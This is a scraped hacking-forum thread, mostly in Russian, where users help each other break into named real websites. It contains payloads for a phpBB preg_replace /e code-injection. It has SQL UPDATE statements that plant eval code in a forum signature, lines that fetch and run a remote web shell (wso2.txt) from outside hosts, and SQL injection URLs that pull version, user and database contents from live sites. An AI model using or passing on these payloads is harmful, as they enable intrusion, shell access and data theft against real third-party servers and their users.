что значит не прокатит? разясните copy('твой_шелл','/tmp/shell'); include('/tmp/shell'); //локальный инклуд временно сможешь глянуть серв, пока сессия не устареет, а за это время успеешь найти вритабельную папку, или порутить серв если повезет
залить в тмп получилось потом пробую инклуд http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=include%28%22/var/www/faunaservis/tmp/xxx.php%22%29; выдает Parse error: syntax error, unexpected $end in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1 может конечно я что то не то делаю, якобы синтаксис не тот... к тому же директория темп не видна из инета...
еще вариант eval-ить удаленно, eval(file_get_contents('шелл, без пхп тегов')); + посмотрите что там за ядро =\ поэтому и инклудим, а не открываем шелл по прямому адресу
ну да.. eval тоже юзал, file_get_contents, d первую очередь пробовал... но увы... UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:file_get_contents("http://.narod.ru/wso2.txt")' WHERE user_id=2; выдало Parse error: syntax error, unexpected $end in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code on line 1 Fatal error: preg_replace() [<a href='function.preg-replace'>function.preg-replace</a>]: Failed evaluating code: file_get_contents(\"http://.narod.ru/wso2.txt\" in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php on line 825 ядро Linux nvh103 2.6.32-5-openvz-amd64 #1 SMP Mon Oct 3 05:12:50 UTC 2011 x86_64 там еще написано This server is protected with the Suhosin Patch 0.9.6.2 подозреваю что не к добру это)
_http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&bb=eval(file_get_contents('http://la2evolution.com/w.txt'));
Да, только чуть-чуть поправил PHP: UPDATE faunaservis.phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[bb]));' WHERE user_id=2; PS там даже папка на залив есть, шелл отправил в пм
Is this website vulnerable? Code: http://www.aminfans.com/products.php?p_id=-2 Tried everything still, nothing works.
Thanks. Code: http://www.barigo.de/shop/front/category_detail.php3?language=l2%27&cat_id=4%27&cat2_id=15%27&item_id=.24%27 Cannot get order by?
2lightangel you yourself are not you ashamed? can all still try to read the manual about sql injections?
Напал на след статьи http://forum.antichat.ru/showthread.php?t=195037 Непонятен вопрос обхода пробелов через магические скобки ))) - Code: () Запросы вида - /script.php?id=(50)union(select(1),database(),2--+) вводят в ступор. Как это работает,там не объясняется.
Скобки не магические, а круглые http://mysql.ru/docs/man/Parentheses.html Просто в некоторых случаях, рядом со скобками (как и с некоторыми другими символами, пример && || @) пробел не обязателен.
хелп, немогу подобрать количество полей PHP: http://logan.ru/faq.html?id=12'+union+select+1,2,3,4,5,6,7,8,9,10,12,13--+ есть ли какойеибуть софт который может ето сделать?? потомучто вручную подбирать срехнутя можно
2qaz, Code: http://logan.ru/faq.html?id=9999+union+select+1,group_concat(0x3a,version(),user(),3,4,5,6,7,8--+ http://forum.antichat.ru/showpost.php?p=2789336&postcount=15 неплохой софт для автоматического проведения инъекции.
а вот, ещо вопрос, есть сайт там вся инфа в таком виде ?????? ???? ????????? ???????????? ? ????? ??????? ??????????? ????????????? ?????? ????????. ????, ????????????? ?? ???? ????? ??? и естественно из БД при sql-in тоже всё в таком виде, как быть? как в нормальном выде слить базу?
